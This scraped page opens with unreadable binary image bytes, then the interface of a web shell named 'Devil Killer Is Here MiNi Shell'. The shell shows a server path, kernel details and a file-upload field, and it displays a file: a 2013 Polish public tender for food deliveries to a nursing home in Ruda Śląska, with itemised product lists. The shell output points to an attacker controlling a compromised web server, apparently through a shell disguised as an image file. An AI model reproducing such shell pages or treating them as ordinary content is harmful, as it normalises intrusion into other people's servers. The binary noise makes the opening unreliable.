JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130521/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130521/196738-N-2013.html

<p class="kh_header"><b>Ruda Śląska: Dostawa artykułów żywnościowych dla Domu Pomocy Społecznej Senior w Rudzie Śląskiej</b><br>
<b>Numer ogłoszenia: 196738 - 2013; data zamieszczenia: 21.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej "Senior" w Rudzie Śląskiej , ul. Puszkina 7, 41-704 Ruda Śląska, woj. śląskie, tel. 032 2481774, faks 032 2481774 w. 33.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych dla Domu Pomocy Społecznej Senior w Rudzie Śląskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa artykułów żywnościowych  z podziałem na wyszczególnione poniżej pakiety:

Pakiet nr 1		Dostawa przetworów spożywczych 
Pakiet nr 2	Dostawa artykułów sypkich 
Pakiet nr 3	Dostawa artykułów nabiałowych 
Pakiet nr 4		Dostawa pieczywa 
Pakiet nr 5		Dostawa wypieków cukierniczych 
Pakiet nr 6	Dostawa warzyw świeżych i suszonych 
Pakiet nr 7	Dostawa owoców świeżych i suszonych
Pakiet nr 8	Dostawa warzyw i owoców mrożonych 
Pakiet nr 9	Dostawa ryb mrożonych, świeżych, wędzonych i przetworów rybnych 
Pakiet nr 10	Dostawa mięsa wieprzowego i wołowego oraz podrobów 
Pakiet nr 11	Dostawa mięsa i podrobów drobiowych 
Pakiet nr 12	Dostawa wędlin 
Pakiet nr 13	Dostawa jaj kurzych 
Pakiet nr 14	Dostawa czekolad i wyrobów cukierniczych 
Pakiet nr 15 Dostawa napojów bezalkoholowych.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-5, 15.41.00.00-5, 15.61.00.00-7, 15.82.11.50-5, 15.83.00.00-5, 15.50.00.00-3, 15.43.00.00-1, 15.81.00.00-9, 15.81.00.00-9, 03.22.00.00-9, 03.21.00.00-6, 03.22.00.00-9, 15.33.24.10-1, 15.33.11.70-9, 15.31.11.00-2, 15.20.00.00-0, 15.22.00.00-6, 15.21.11.00-1, 15.11.00.00-2, 15.11.40.00-0, 15.11.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 15.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania przez Wykonawcę warunku, Wykonawca zobowiązany jest przedłożyć wraz z ofertą oświadczenie o dysponowaniu środkiem transportu niezbędnym do wykonania zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.dps-senior.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej Senior w Rudzie Śląskiej, ul. Puszkina 7, Dz. Techniczno-Zaopatrzeniowy, pokój nr 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.05.2013 godzina 11:30, miejsce: Dom Pomocy Społecznej Senior w Rudzie Śląskiej,  ul. Puszkina 7, 41-704 Ruda Śląska 
pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa przetworów spożywczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

LP	Nazwa artykułu	Sugerowana wielkość opakowania	Jm	Orientacyjna ilość
zamówienia	Cena jedn. netto	Wartość netto
I	Przetwory, tłuszcze roślinne	 	 	 	 	 
1	Ananas kons. Plastry-(masa netto bez zalewy)	300-1000g	kg	10		
2	Brzoskwinie kons.-(masa netto bez zalewy) 	300-1000g 	kg	9		
3	Chrzan tarty na kwasku cytrynowym	170-300g	kg	11		
4	Ćwikła z chrzanem	250-500g	kg	3		
5	Dżemy owocowe niskosłodzone z kawałkami owoców (różne smaki) 	250-350g	kg	50		
6	Fasola czerwona, biała konserwowa-(masa netto bez zalewy)	200-500g	kg	5		
7	Fasola szparagowa konserwowa-(masa netto bez zalewy)	200-1000g	kg	35		
8	Groszek konserwowy- (masa netto bez zalewy)	200-500g	kg	50		
9	Krem chrzanowy	170-300g	kg	2		
10	Ketchup łagodny(minimum 55%przecieru pomidorowego	250-1000g	kg	95		
11	Koncentrat pomidorowy30%	800-1000g	kg	65		
12	Koncentrat pomidorowy30%	180-200g	kg	25		
13	Koncentrat buraczany płynny min.12%soku 
z buraków	180-500g	kg	6		
14	Krem czekoladowy 
do smarowania z dodatkiem orzechów	180-400g	kg	10		
15	Kukurydza konserwowa- (masa netto bez zalewy)	200-500g	kg	9		
16	Marmolada wielosmakowa	200-1000g	kg	1		
17	Mieszanka warzywna koktailowa kons. (party mix) -(masa netto bez zalewy)	200-1000g	kg	0,5		
18	Miód naturalny	200-500g	kg	13		
19	Musztarda delikatesowa	800-1000g	kg	65		
20	Musztarda delikatesowa	150-250g	kg	30		
21	Ocet 10%	0,5l	l	45		
22	Ogórki konserwowe całe -(masa netto bez zalewy)	900-1000g	kg	95		
23	Olej uniwersalny rzepakowy	0,90-1,0 l	l	330		
24	Olej słonecznikowy	0,5-1,0l	l	10		
25	Oliwki drylowane -(masa netto bez zalewy)	50-200g	kg	0,5		
26	Papryka konserwowa słodka płaty -(masa netto bez zalewy)	500-1000g	kg	5		
27	Pieczarki marynowane całe -(masa netto bez zalewy)	150-400g	kg	0,5		
28	Powidła śliwkowe	280-500g	kg	30		
29	Przyprawa do zup w płynie	900-1000g	l	210		
30	Seler konserwowy (nitki)-(masa netto bez zalewy)	280-500g	kg	6		
31	Sos słodko kwaśny, chiński, meksykański, itp..	300-600g	kg	12		
32	Zaprawa cytrynowa min.40%soku z cytryny	0,5-1l	l	260		
33	Majonez sałatkowy	180-300g	kg	30		
34	Majonez sałatkowy	800-1200g	kg	50		
II	Konserwy mięsne	 	 	 		
1	Mielonka konserwowa 	100-300g	kg	30		
2	Szynka konserwowa wieprzowa 	100-300g	kg	5		
3	Szynka konserwowa drobiowa 	100-300g	kg	12		
4	Pasztet drobiowy smakowy	100-200g	kg	15		
5	Pasztet drobiowy 	160g	kg	40		
6	Pasztet wieprzowy	100-300g	kg	75		
III	Bakalie	 	 	 		
1	Rodzynki	100 - 500g	kg	2		
2	Kokos - wiórki	100 - 500g	kg	1		
3	Orzechy włoskie łuskane	100-500g	kg	2		
4	Morele suszone	100-500g	kg	2		
5	Migdały - płatki	50-200g	kg	1,5		
6	Śliwki kalifornijskie	100-500g	kg	1		
7	Skórka pomarańczowa kandyzowana	50-100g	kg	0,2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-5, 15.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> DOSTAWA ARTYKUŁÓW SYPKICH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

LP	Nazwa artykułu	Sugerowana wielkość opakowania	Jm	Orientacyjna ilość
zamówienia	Cena jedn. netto	Wartość netto
1	Budyń - różne smaki (bez cukru)	1000g	kg	20		
2	Budyń - różne smaki (bez cukru)	35-50g	kg	8		
3	Bulion grzybowy, sypki	500-1000g	kg	2		
4	Cukier kryształ	1000g	kg	1350		
5	Cukier puder	500-1000g	kg	1		
6	Cukier wanilinowy	10-50g	kg	1,5		
7	Cynamon mielony	10-20g	kg	0,3		
8	Czosnek granulowany,polski	10-20g	kg	7,00		
9	Galaretka owocowa, różne smaki	75-100g	kg	30		
10	Gałka muszkatołowa, mielona	10-20g	kg	0,10		
11	Herbata expresowa owocowa, różne smaki	30-40g	kg	1,00		
12	Herbata expresowa czarna a,100 szt	100-150g	kg	50		
13	Herbata expresowa ziołowa (mięta, melisa, rumianek)	30-40g	kg	0,3		
14	Kakao extra, ciemne	100-200g	kg	3		
15	Kasza gryczana, cała	500-1000g	kg	20		
16	Kasza jęczmienna , średnia	500-1000g	kg	60		
17	Kasza manna	500-1000g	kg	50		
18	Kaszka mleczno - ryżowa (smakowa)	230g	kg	10		
19	Kawa naturalna mielona 100%	100g	kg	15		
20	Kawa naturalna mielona 100%	250-500g	kg	30		
21	Kawa zbożowa	200-500g	kg	25		
22	Kleik ryżowy	160-200g	kg	4		
23	Kminek	10-20g	kg	0,20		
24	Koperek suszony	10-25g	kg	0,2		
25	Kwasek cytrynowy	10-20g	kg	0,8		
26	Liść laurowy	5-20g	kg	0,20		
27	Majeranek	5-20g	kg	0,6		
28	Makaron 4 jajeczny - łazanki *	250-1000g	kg	15		
29	Makaron 4 jajeczny - nitki *  	250-1000g	kg	65		
30	Makaron 4-jajeczny - (kolanka, rurki, muszelki, świderki) *	250-1000g	kg	110		
31	Mąka pszenna poznańska	1000g	kg	350		
32	Mąka ziemniaczana	1000g	kg	220		
33	Mąka krupczatka	1000g	kg	3		
34	Mąka żytnia żurek	1000g	kg	20		
35	Papryka słodka mielona	10-20g	kg	2,5		
36	Pieprz czarny mielony	10-20g	kg	3		
37	Płatki kukurydziane smakowe	500-1000g	kg	10		
38	Płatki owsiane	500g	kg	25		
39	Płatki ryżowe	200-500g	kg	15		
40	Proszek do pieczenia	10-50g	kg	0,10		
41	Przyprawa kebab, gyros, curry	10-20g	kg	0,10		
42	Przyprawa warzywna 
do potraw	75-200g	kg	12		
43	Rosół drobiowy,  sypki	500-3000g	kg	30		
44	Ryż biały	1000g	kg	140		
45	Soda oczyszczona	10-50g	kg	0,10		
46	Sos pieczeniowy jasny	25-50g	kg	2		
47	Sos pieczeniowy ciemny	25-50g	kg	4,0		
48	Sos sałatkowy, różne smaki	8-20g	kg	0,50		
49	Sól spożywcza jodowana	1000g	kg	200		
50	Sucharki	280-300g	kg	8		
51	Ziele angielskie	10-20g	kg	0,4		
52	Żelatyna spożywcza wieprzowa	50g	kg	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.00.00-7, 15.82.11.50-5, 15.83.00.00-5, 15.84.10.00-5, 15.85.10.00-8, 15.86.00.00-4, 15.87.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> DOSTAWA ARTYKUŁÓW NABIAŁOWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

Lp	Nazwa artykułu	 Sugerowana wielkość
opakowania 	Jm	Orientacyjna ilość
zamówienia	Cena jedn. netto	Wartość netto
1	Deser wielosmakowy: ryżowy, z kaszą manną 	120-200g	kg	80		
2	Deser wielosmakowy z bitą śmietaną na bazie budyniu,  twarożku 	120-200g	kg	120		
3	 Jogurt owocowy 	125-200g	kg	270		
4	Jogurt naturalny 	150-200g	kg	140		
5	Maślanka naturalna karton	1L	l	300		
6	Maślanka owocowa	250-500g	kg	75		
7	Kefir naturalny	150-200g	kg	55		
8	Margaryna do smarowania pieczywa z dodatkiem masła	500g	kg	10		
9	Margaryna mleczna zwykła 	250g	kg	150		
10	Masło extra 82% 	200g	kg	850		
11	Mleko 2%  	10-20l 	l	5500		
12	Mleko 2%  w folii	1l	l	300		
13	Mleko w proszku	500g	kg	2		
14	Ser biały półtłusty - krajanka	kg	kg	290		
15	Ser twarogowy kremowy	kg	kg	10		
16	Ser podpuszczkowy pleśniowy 	100-200g	kg	7		
17	Ser typu feta	100-300g	kg	0,5		
18	Ser domowy z kminkiem	150-200g	kg	70		
19	Ser wielosmakowy fromage	75-100g	kg	40		
20	Ser żółty łagodny 45%	1000-3000g	kg	100		
21	Ser żółty wędzony	1000-2000g	kg	5		
22	Serek topiony kremowy - kostka,27% tł.(pochodzenia zwierzęcego)-różne smaki	100g	kg	90		
23	Serek topiony kremowy wędzony 	1000-2000g	kg	55		
24	Serek homogenizowany różne smaki	100-200g	kg	240		
25	Serek naturalny homogenizowany	100-200g	kg	60		
26	Serek kanapkowy twarożkowy, kremowy - różne smaki	100-150g	kg	100		
27	Serek twarożkowy wiejski ziarnisty	200g	kg	130		
28	Śmietanka do kawy 10% tłuszczu	10 g	szt.	1200		
29	Śmietana spożywcza słodka 18% tłuszczu 	250-500ml	l	170		
30	Śmietana 12% tłuszczu homogenizowana 	180g-400g	kg	10		
31	Śmietana 30%tłuszczu- kremówka	200-500g	kg	15		
32	Smalec wieprzowy kostka	200-250g	kg	25		
33	Napój probiotyczny 	100g	kg	25		
34	Mleczko smakowe	200g	szt.	20		
35	Drożdże piekarnicze świeże	42-100g	kg	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.43.00.00-1, 15.89.80.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> DOSTAWA PIECZYWA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA


L.p	Nazwa artykułu	Sugerowana waga jednostkowa	Jm	Orientacyjna
ilość zamówienia	Cena jedn. netto	Wartość netto
1
	Chleb  pszenno- żytni krojony	900-1000g	kg	6700		
2
	Chleb wielosmakowy - krojony (słonecznikowy, sojowy, graham, karmelowy, cebulowy, razowy itd.)	400-500g	kg	730		
3-	Wek krojony	300g-500g	kg	85		
4-	Bułka kajzerka	50g	kg	720		
5
	Pieczywo mleczne (rogal, chałka)	60g-100g	kg	20		
6	Bułka mleczna	60g-80g	kg	100		
7	Groszek ptysiowy		kg	2,5		
8	Bułka tarta	400-500g	kg	110.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> DOSTAWA WYPIEKÓW CUKIERNICZYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA


Lp.	Nazwa artykułu	Sugerowana waga jednostkowa	Jm	Orientacyjna ilość zamówienia	Cena jedn. netto	Wartość netto
1	Rogalik z różnymi nadzieniami(budyń, śmietana, czekolada itp.)	70-100g	kg	130		
2	Drożdżówka wielosmakowa (ser-mak, ser-marmolada )	100-120g	kg	45		
3	Drożdżówka z ograniczoną ilością cukru	100-120g	kg	15		
4	Jagodzianka	70-100g	kg	50		
5	Pączki z różnymi nadzieniami (śmietana, marmolada, budyń, adwokat itd..)	100g	kg	120		
6	Pączki z ograniczoną ilością cukru, bez polewy	100g	kg	30		
7	Ciastka W-Z	100g	kg	15		
8	Sernik 
na drożdżowym spodzie	 	kg	50		
9	Ciasto drożdżowe z posypką	 	kg	30		
10	Ciasto z owocami 
na drożdżowym spodzie 	 	kg	90		
11	Ciasto z owocami 
na piaskowym spodzie	 	kg	100		
12	Szarlotka	 	kg	50		
13	Sernik na cieście ucieranym	 	kg	50		
14	Rolada z bitą śmietaną	 	kg	30		
15	Ptysie miniaturki ze śmietaną, budyniem 	 	kg	10		
16	Ciasteczka kokosanki	 	kg	30		
17	Piernik do moczki		kg	3		
18	Piernik z bakaliami 	 	kg	15		
19	Babeczki piaskowe	70-100g	kg	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> DOSTAWA WARZYW ŚWIEŻYCH I SUSZONYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA


 	Nazwa artykułu	Sugerowana waga jednostkowa	Jm	Orientacyjna ilość zamówienia	Cena jedn. netto	Wartość netto
1	Buraki 	 	kg	400		
2	Botwinka 	 	kg	8		
3	Brokuły różyczka 	 	kg	30		
4	Cebula	 	kg	240		
5	Cebulka zielona, szczypiorek (VII-X m-c)	 	kg	25		
6	Cebulka zielona, szczypiorek- (XI-XII m-c)	 	kg	10		
7	Czosnek polski	 	kg	14		
8	Kalafior różyczka 	 	kg	200		
9	Kalarepa	 	kg	20		
10	Kapusta biała	 	kg	350		
11	Kapusta biała młoda 	 	kg	150		
12	Kapusta czerwona	 	kg	230		
13	Kapusta czerwona młoda 	 	kg	80		
14	Kapusta kiszona 	 	kg	400		
15	Kapusta pekińska	 	kg	60		
16	Kapusta włoska	 	kg	60		
17	Kapusta włoska młoda	 	kg	20		
18	Koperek zielony (VII-X m-c)	 	kg	35		
19	Koperek zielony (XI-XII m-c)	 	kg	15		
20	Ogórki kiszone	 	kg	90		
21	Ogórki małosolne	 	kg	25		
22	Ogórki zielone (VII-X m-c)	 	kg	140		
23	Ogórki zielone  (XI-XII m-c)	 	kg	25		
24	Papryka czerwona 	 	kg	20		
25	Pieczarki	 	kg	130		
26	Pietruszka korzeń	 	kg	350		
27	Pietruszka zielona (VII-X m-c)	 	kg	60		
28	Pietruszka zielona (XI-XII m-c)	 	kg	30		
29	Pomidorki koktailowe	 	kg	0,5		
30	Pomidory (VII-X m-c)	 	kg	280		
31	Pomidory (XI-XII m-c)	 	kg	70		
32	Por	 	kg	80		
33	Rzodkiewka (VII-X m-c)	100g	pęczek	60		
34	Rzodkiewka (XI-XII  m-c)	100g	pęczek	20		
35	Sałata ozdobna	200g	szt	5		
36	Sałata zielona (VII-X m-c)	300g	szt	60		
37	Sałata zielona (XI-XII m-c)	200g	szt	5		
38	Seler korzeń	 	kg	400		
39	Marchew	 	kg	1100		
40	Ziemniaki 	 	kg	7500		
41	Ziemniaki młode (VII m-c)	 	kg	1500		
42	Fasola kolorowa	 	kg	10		
43	Fasola Jaś	 	kg	35		
44	Fasolka szparagowa		kg	60		
45	Groch łuszczony	 	kg	20		
46	Pasternak		kg	1		
47	Mak niebieski	 	kg	10		
48	Ziarno sezamu	 	kg	0,2		
49	Grzyby suszone	 	kg	2,5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9, 03.21.00.00-6.</p></li>
